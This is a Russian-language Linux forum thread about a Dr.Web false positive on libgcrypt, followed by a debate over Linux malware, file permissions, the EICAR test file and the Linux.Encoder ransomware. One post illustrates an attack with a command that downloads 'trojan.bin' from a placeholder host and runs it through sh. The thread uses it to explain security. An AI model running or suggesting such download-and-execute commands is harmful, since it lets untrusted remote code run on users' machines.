О вирусах в Линуксе
О вирусах в Линуксе
Сидел на каком то сайте. Все прочитал. Закрываю браузер и вылетает вот такая шняга.
А говорят нет троянов для Линя. Или это ложняк и смело писать Доктору?
А говорят нет троянов для Линя. Или это ложняк и смело писать Доктору?
- DELTA-79
- Сообщения: 1916
- Зарегистрирован: 14 янв 2012, 14:07
- Откуда: Георгиевск Ставропольский кр.
- Контактная информация:
Re: О вирусах в Линуксе.
Одно только название "DrWEB" у меня уже не вызывает доверия: Он уже давно был замечен на том, что "ловил" вирусы для линукса. и даже называл файл, в котором он может храниться, мол если замечена длина больше чем N, значит там вирус, вот только этот файл был обязан быть не меньше длинны N. Вот не помню тот сайт, даже на этом форуме как то обсуждался... К тому же, учитывая местонахождение этого вируса, вы явно работаете под ROOTом
Intel(R) Core(TM) i3-3220 CPU @ 3.30GHz / 4 Gb RAM / NVIDIA GeForce GT 240 / Rosa 2012.1 R5 х86_64
Re: О вирусах Линуксе.
В irc где-то сидели?
Другой бэкдор для Mac OS X — Mac.BackDoor.Tsunami — является адаптированной под архитектуру Apple версией троянца для Linux с названием Linux.BackDoor.Tsunami. Злоумышленники управляют им с использованием протокола IRC (Internet Relay Chat).
- VictorR2007
- Сообщения: 7734
- Зарегистрирован: 12 сен 2011, 13:00
Re: О вирусах в Линуксе.
Обычно они на сайтах с порнухой.
Дайте адрес, что-бы нам не нарваться и заранее обходить этот сайт.
Дайте адрес, что-бы нам не нарваться и заранее обходить этот сайт.
Re: О вирусах в Линуксе.
Нормальный антивирь Dr.Web.
Re: О вирусах в Линуксе.
Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.
Re: О вирусах в Линуксе.
Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.Barmalei писал(а):Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.
Re: О вирусах в Линуксе.
Если еще найду его. Может быть придется вас просить выложить этот файл.PastorDi писал(а):Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.Barmalei писал(а):Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.
Re: О вирусах в Линуксе.
Если найдете файл, в чём я сильно сомневаюсь, то на проверку в https://www.virustotal.com/ru/ Да и сравнить с файлом из соответствующего пакета нужно обязательно.
Re: О вирусах в Линуксе.
Карантина не нашел. Доктор молчит. Может дадите этот файл мне?
- VictorR2007
- Сообщения: 7734
- Зарегистрирован: 12 сен 2011, 13:00
Re: О вирусах в Линуксе.
Вам его и не найти, судя по сообщению на картинке.Barmalei писал(а):Карантина не нашел. Доктор молчит. Может дадите этот файл мне?
Там нет сообщения, что в карантине.
- VictorR2007
- Сообщения: 7734
- Зарегистрирован: 12 сен 2011, 13:00
Re: О вирусах в Линуксе.
А что за антивирус?
Вроде он у вас в режиме демона и постоянной защиты.
Уже много лет не следил за эти софтом.
Вроде он у вас в режиме демона и постоянной защиты.
Уже много лет не следил за эти софтом.
Re: О вирусах в Линуксе.
Ложняк сказали. Но как теперь искать этот файл.
Re: О вирусах в Линуксе.
Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.
Последний раз редактировалось notauser 25 мар 2015, 20:09, всего редактировалось 1 раз.
Re: О вирусах в Линуксе.
А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64
Re: О вирусах в Линуксе.
Спасибо. Я рылся так и не нашел.notauser писал(а):http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm
Re: О вирусах в Линуксе.
Проще так будет:Barmalei писал(а):А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64
Код: Выделить всё
urpmi --replacepkgs lib64gcrypt20
Re: О вирусах в Линуксе.
Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20 

Последний раз редактировалось notauser 25 мар 2015, 20:53, всего редактировалось 1 раз.
Re: О вирусах в Линуксе.
Ваш вариант не прошел.PastorDi писал(а): Проще так будет:Код: Выделить всё
urpmi --replacepkgs lib64gcrypt20
Re: О вирусах в Линуксе.
Скопировал, система загрузилась, но доктор съел файл. Сейчас отрубил его и снова скопировал. Все работает.notauser писал(а):Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20
Всем спасибо. А доктору минус.
Re: О вирусах в Линуксе.
Естественно.Barmalei писал(а):Ваш вариант не прошел.PastorDi писал(а): Проще так будет:Код: Выделить всё
urpmi --replacepkgs lib64gcrypt20
libgcrypt это LGPL-библиотека шифрования — библиотека времени выполнения
libgcrypt включает в себя функции шифрования. В ней реализовано множество
важных свободных шифров, хеш-алгоритмов и алгоритмов подписи публичных
ключей:
Arcfour, Blowfish, CAST5, DES, AES, Twofish, Serpent, rfc2268 (rc2), SEED,
Camellia, IDEA, Salsa, CRC, MD4, MD5, RIPE-MD160, SHA-1, SHA-256, SHA-512,
Tiger, Whirlpool, DSA, DSA2, ElGamal, RSA, ECC.
Re: О вирусах в Линуксе.
notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.
Re: О вирусах в Линуксе.
Я бесплатно тестирую его.notauser писал(а):notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.
А какие защиты в Линукс?
Фаервол по дефолту. Root пасс и сижу под пассовым юзвером.
- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такоеPastorDi писал(а):Трояны уже вшиты в линукс!Чё вы так волнуетесь?
![]()


Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
Это реальная фишка с таким названием.
Cisco Secure Desktop aka Cisco Trojan
Возможно, изменим перевод на менее пугательный.
Cisco Secure Desktop aka Cisco Trojan
Возможно, изменим перевод на менее пугательный.
Re: О вирусах в Линуксе.
Как автор этого перевода уверяю вас, что перевод правильный и такой скрипт (точнее бинарник) реально есть.Галахов Роман писал(а):Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такоеPastorDi писал(а):Трояны уже вшиты в линукс!Чё вы так волнуетесь?
![]()
Вот такая строка была в оригинале:
"Allow Cisco Secure Desktop &trojan"
Вот такое можно найти к этому описание:
The 'Cisco Secure Desktop' is a bit of a misnomer — it works by downloading a trojan binary from the server and running it on your client machine to perform some kind of 'verification' and post its approval back to the server.
Таким образом, трояны не вшиты в Linux, но если кому-то сильно хочется (без этого нельзя подключиться к Cisco Secure Desktop), то они поддерживаются.
Re: О вирусах в Линуксе.
заговорили о троянах в линукс и почему то все забыли о самой сильной защите линукса от вирусов - это права доступа. попробуйте скачать файл , любой бинарь под линь и глянуть что у него там в правах стоит.)) уверяю о антивирусах забудете сразу.)))
Re: О вирусах в Линуксе.
suid (setuid setgid)
Весь вопрос в механизмах распространения.
Весь вопрос в механизмах распространения.
Последний раз редактировалось notauser 26 мар 2015, 19:53, всего редактировалось 1 раз.
Re: О вирусах в Линуксе.
setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.
Re: О вирусах в Линуксе.
> любой файл скачанный из сети не имеет прав на запуск
Вы точно это знаете? В смысле это не зависит от файловой системы и опций её монтирования?
Вы точно это знаете? В смысле это не зависит от файловой системы и опций её монтирования?
Re: О вирусах в Линуксе.
я работаю с ext системами и как поведет себя btrfs и прочие не знаю. экспериментов не ставил. но можно будет проверить.)) а с ext системами такая защита присутствует очень давно. я застал использование еще ext2)) а вот в других не было необходимости, так что полагаю тут нужно проверять на практике.
Re: О вирусах в Линуксе.
Ух ты. Ну если Вы ещё застали и перипетии с ELF, то
зачем Вы всё это так непонятно пишите?


Re: О вирусах в Линуксе.
ну мне было лет 18)) а любопытен я был чрезмерно.)) так что да поначалу промышлял для удовольствия изучением операционных систем и поиска их слабых мест.)) и на тот момент нормальной альтернативы ext в линуксе и не было. и да были elf файлы. потом от них избавились, точнее перешли на другое. там и правда был гемор, но ничего страшного, только для тех кто не смог обеспечить нормального доступа к ним. и да до сих пор из-за прав доступа линукс можно отстроить как непробиваемую стену. но кто этим ща занимается. но многое по умолчанию сделано вполне грамотно. потом у меня как то запал иссяк и я уже не так ковырял сиистему, да и фс появились в избытке с вполне нормальной работой в линксе. впрочем я до сих пор не ощущаю необходимости в других фс. ext вполне на уровне. обычному пользователю не имеет смысла искать что то еще. это скорее удел профи админов под конкретный сервак.))
Re: О вирусах в Линуксе.
понятно. но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.slavyanix писал(а):setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.
сегодня тока на почту якобы от банка пришел баланс в exe файле. отправил сразу в вирлаб, подозреваю что там шифровальщик был.
Re: О вирусах в Линуксе.
да экзешник лучше проверить.
Re: О вирусах в Линуксе.
> но я решил для Вынь качать и проверять проги на Линь
Несмотря на жаргон, я понял что вы хотели сказать. Так и ставте соответствующие решения. А не антивирус для домохозяйки у которой вдруг Linux. Расчет простой: Вот вам анивирь - купите. Не нужен, говорят безопасная система - так в ней вирус - долой - не работает - так был вирус - какой - плохой - все пропало, но мы вас спасли - купите Windows - так в ней вирус - долой - работает. +1 клиент. Barmalei , Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.
Несмотря на жаргон, я понял что вы хотели сказать. Так и ставте соответствующие решения. А не антивирус для домохозяйки у которой вдруг Linux. Расчет простой: Вот вам анивирь - купите. Не нужен, говорят безопасная система - так в ней вирус - долой - не работает - так был вирус - какой - плохой - все пропало, но мы вас спасли - купите Windows - так в ней вирус - долой - работает. +1 клиент. Barmalei , Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.
Re: О вирусах в Линуксе.
ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный. и тут надо озадачится вопросом что в линь лучше проверяет на вирусы. не обязательно же платные антивири будут лучше. уверен есть хорошие бесплатные аналоги. в любом случае улучшего антивиря процент отлова где то 97-98%. увы 2% что проскочит.
Re: О вирусах в Линуксе.
>Так и ставте соответствующие решения
> ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный.
Вендоры предлагают линейку решений - для шлюза, почтового сервера, etc и используют в них, в смысле решениях, "Linux-технологии". И это работает. Но защищает пользователей Windows.
> ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный.
Вендоры предлагают линейку решений - для шлюза, почтового сервера, etc и используют в них, в смысле решениях, "Linux-технологии". И это работает. Но защищает пользователей Windows.
Re: О вирусах в Линуксе.
>Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.
Сам отправил.
SHA256: 916ab9e74cc478a14bc80bf5557df9a851667a6876ab9c071cac678ffce0c0a0
Имя файла: libgcrypt.so.20.0.1
Показатель выявления: 0 / 57
Дата анализа: 2015-03-26 19:57:07 UTC (0 минут назад)
Делайте выводы. А лучше спросите напрямую почему такой результат при сигнатурном анализе. И пусть не говорят про что-то другое в Linux.
Сам отправил.
SHA256: 916ab9e74cc478a14bc80bf5557df9a851667a6876ab9c071cac678ffce0c0a0
Имя файла: libgcrypt.so.20.0.1
Показатель выявления: 0 / 57
Дата анализа: 2015-03-26 19:57:07 UTC (0 минут назад)
Делайте выводы. А лучше спросите напрямую почему такой результат при сигнатурном анализе. И пусть не говорят про что-то другое в Linux.
Re: О вирусах в Линуксе.
Linux == вирусPastorDi писал(а):Трояны уже вшиты в линукс!Чё вы так волнуетесь?
![]()
Re: О вирусах в Линуксе.
Линукс - распределенный многопользовательский кооперативный конструктор с элементами квеста, а никакой не вирус! 

Re: О вирусах в Линуксе.
slavyanix писал(а):любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)).
Код: Выделить всё
cd
wget -c http://somebody.com/trojan.bin
sh ~/trojan.bin
Re: О вирусах в Линуксе.
Единственный еще рабочий виндовый антивирус в организации у нас ClamWin с мордашкой к нему. Нужен больше для успокоения пользователей, чем реальная помощь админу. В Cydwin еще и ClamAV есть.Barmalei писал(а):но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.
Для проверки небольших программ есть ВирусТоталь, для больших - оффсайт и ClamAV под RELS.
Re: О вирусах в Линуксе.
> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"
Это вроде как для скриптов вне зависимости от бита "исполняемый"
-
- Сообщения: 120
- Зарегистрирован: 01 апр 2014, 23:26
Re: О вирусах в Линуксе.
Извините за оффтоп, и спасибо за хорошее настроение к вечеру!))
Re: О вирусах в Линуксе.
попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))viktor писал(а):> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"
Re: О вирусах в Линуксе.
Со скриптами проканывает.slavyanix писал(а): попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))
Код: Выделить всё
ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр 1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True
Но напакостить и скриптами можно. В том числе и разрешить исполнение.
Re: О вирусах в Линуксе.
Сам попробуй. Я знаю.slavyanix писал(а):попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))viktor писал(а):> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"
Вот содержимое файла дла опытов, например
#! /bin/bash
zenity --question --text "`ls`"
Re: О вирусах в Линуксе.
Ммм, интересно в браузере антивирус есть? Кто блокирует так на подлете еще? DrWeb точно не умеет.
Re: О вирусах в Линуксе.
Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.
Re: О вирусах в Линуксе.
Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.PastorDi писал(а):Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.
- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверитьBarmalei писал(а):Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.htmlГалахов Роман писал(а):Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверитьBarmalei писал(а):Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.
- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Скачал все 8 файлов без проблем Думайте...Barmalei писал(а):Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.html
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.

Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
Ладно. Скоро снесу DrWeb и проверю.
Re: О вирусах в Линуксе.
На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!Barmalei писал(а):Ладно. Скоро снесу DrWeb и проверю.

Re: О вирусах в Линуксе.
Удалил DrWeb. Кто то дальше блокирует.PastorDi писал(а):На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!Barmalei писал(а):Ладно. Скоро снесу DrWeb и проверю.

- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?Barmalei писал(а):Удалил DrWeb. Кто то дальше блокирует.
Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
Barmalei писал(а):Спасибо. Я рылся так и не нашел.notauser писал(а):http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm
Код: Выделить всё
$ urpmf libgcrypt.so.20.0.1
lib64gcrypt20:/usr/lib64/libgcrypt.so.20.0.1
libgcrypt20:/usr/lib/libgcrypt.so.20.0.1
$ urpmq --sources lib64gcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm
$ urpmq --sources libgcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm
$ wget http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm
$ ark -d lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm
$ ark -d libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm
Последний раз редактировалось *d0s 09 май 2015, 14:41, всего редактировалось 1 раз.
Re: О вирусах в Линуксе.
ClamAV интересно себя ведет. Ранее на многих дистрибутивах в основном ругался на man & ruby, когда была версия 0.94/0.95.
Теперь когда 0.96/0.97 ругается на это (см. вложение)
Теперь когда 0.96/0.97 ругается на это (см. вложение)
- Вложения
-
- май-09-2015.log
- (848.22 КБ) 988 скачиваний
Re: О вирусах в Линуксе.
Только мультимедиа.Галахов Роман писал(а):Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?Barmalei писал(а):Удалил DrWeb. Кто то дальше блокирует.
- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Странно... Установил ваши расширения: И снова все скачал...Barmalei писал(а):Только мультимедиа.
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?
Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
Брандмауэр/Firewoll не трогал, все по дефолту как установил. Других браузеров не имею.Галахов Роман писал(а):Странно... Установил ваши расширения: И снова все скачал...Barmalei писал(а):Только мультимедиа.
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?
Фиг с ним. Пусть блокириует. Это все таки +.
Re: О вирусах в Линуксе.
Нашел кто блокирует этот файл. Вот он в самом браузере.
- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Этот пункт у меня всегда включен, но это не помешало скачать те файлы.
Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
Я его выключил и скачал, с ним блокирует.Галахов Роман писал(а):Этот пункт у меня всегда включен, но это не помешало скачать те файлы.
- Галахов Роман
- Сообщения: 2293
- Зарегистрирован: 26 фев 2012, 20:02
- Откуда: Моск. обл. Волоколамск
Re: О вирусах в Линуксе.
Очень странно... При одних и тех же настройках FF срабатывает по разному...Barmalei писал(а):Я его выключил и скачал, с ним блокирует.
Rosa 2021.1 Fresh HIPER SLIM
Re: О вирусах в Линуксе.
А что в справка - информация для решения проблемBarmalei писал(а):Я его выключил и скачал, с ним блокирует.Галахов Роман писал(а):Этот пункт у меня всегда включен, но это не помешало скачать те файлы.
Re: О вирусах в Линуксе.
Да, странно что-то.Галахов Роман писал(а):Очень странно... При одних и тех же настройках FF срабатывает по разному...Barmalei писал(а):Я его выключил и скачал, с ним блокирует.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.
Re: О вирусах в Линуксе.
Прослойка Доктора не блокирует, а ловит и ложит в карантин.PastorDi писал(а):Да, странно что-то.Галахов Роман писал(а): Очень странно... При одних и тех же настройках FF срабатывает по разному...
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.
Re: О вирусах в Линуксе.
НеBarmalei писал(а):Прослойка Доктора не блокирует, а ловит и ложит в карантин.PastorDi писал(а): Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.

На Винде я наблюдал таку штуку (давно), когда Dr.Web ставится, он подменяет winsok.dll на свой. (видимо пропатченый для слежения иперехвата). Но это давно было. Хотя, может такую же технологию они до сих пор используют. И на линуксе тоже, весь все либы сетевые в открытом доступе.
Можно посоветовать что? Переустановить сетевые пакеты, типа urpmi --replacepkg <пакет>. Тогда с реп, переставятся либы сетевые в чистом виде. И все будет в нормальном режиме работать.
Re: О вирусах в Линуксе.
Нет никакой прослойки у DrWeb которая блокирует прямо в браузере. Там стоит антивирус и ловит во время скачивания.
Больше я спорить не буду. Это все делает FF, потому что антивирус точно к этому пункту в FF не прилепят они. А почему у вас не робит я не знаю.
Все о защите в FF https://support.mozilla.org/ru/kb/kak-r ... ta-ot-vred
Больше я спорить не буду. Это все делает FF, потому что антивирус точно к этому пункту в FF не прилепят они. А почему у вас не робит я не знаю.
Все о защите в FF https://support.mozilla.org/ru/kb/kak-r ... ta-ot-vred
Последний раз редактировалось Barmalei 11 май 2015, 19:37, всего редактировалось 3 раза.
Re: О вирусах в Линуксе.
Может где-то запись имеется как по этому сценарию http://forum.rosalab.ru/viewtopic.php?f=53&t=5569
Например тут - /etc/ld.so
Например тут - /etc/ld.so
Re: О вирусах в Линуксе.
Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml
Re: О вирусах в Линуксе.
«Получив несанкционированный доступ к сайту, киберпреступники размещали на нем...»ans писал(а):новые подробности
М.б. не допускать несанкционированный доступ к сайту?

Talk is cheap. Show me the code.
Linus Torvalds
Linus Torvalds
Re: О вирусах в Линуксе.
12 ноября 2015 годаans писал(а):Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml
Ранее (9) bitdefender http://labs.bitdefender.com/2015/11/lin ... ption-key/ утер "доктора", предлагая расшифровщик бесплатно всем желающим. "Доктор" сделал выводы, и сообщил буквально "сохраняется вероятность того, что злоумышленники со временем могут модифицировать используемые ими алгоритмы шифрования, устранив все «слабые места». Поэтому серьезная опасность потерять важные файлы сохраняется даже для пользователей такой относительно безопасной ОС, как Linux, и в первую очередь — для администраторов веб-сайтов, работающих под управлением популярных систем управления контентом. Напоминаем, что сигнатура Linux.Encoder.1 добавлена в базы Антивируса Dr.Web для Linux. Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации." http://news.drweb.ru/show/?i=9699&c=5&lng=ru&p=0
Делайте выводы.
Re: О вирусах в Линуксе.
Со скриптами проканывает.
С бинарями нет.
Но напакостить и скриптами можно. В том числе и разрешить исполнение.[/quote]
это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))
Код: Выделить всё
ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр 1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True
Но напакостить и скриптами можно. В том числе и разрешить исполнение.[/quote]
это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

Re: О вирусах в Линуксе.
https://ru.wikipedia.org/wiki/Bashdoorslavyanix писал(а): это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))
Re: О вирусах в Линуксе.
ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.
Re: О вирусах в Линуксе.
Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...
И тут DrWeb обложался на фоне всех остальных антивирусов...

О, сколько нам открытий чудных готовит Microsoft’а дух, и Intel - сын ошибок трудных, и Borland - Paradox’ов друг...
Re: О вирусах в Линуксе.
Что то это за файл знаете? Компания «Доктор Веб», Linux.Encoder.1. Ну, вы поняли 

Re: О вирусах в Линуксе.
На Вирустотал факторов много, не один DrWeb виноват. У меня пролетели все мигом.Xakep писал(а):Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...
Re: О вирусах в Линуксе.
"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации." 

Re: О вирусах в Линуксе.
Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."
Re: О вирусах в Линуксе.
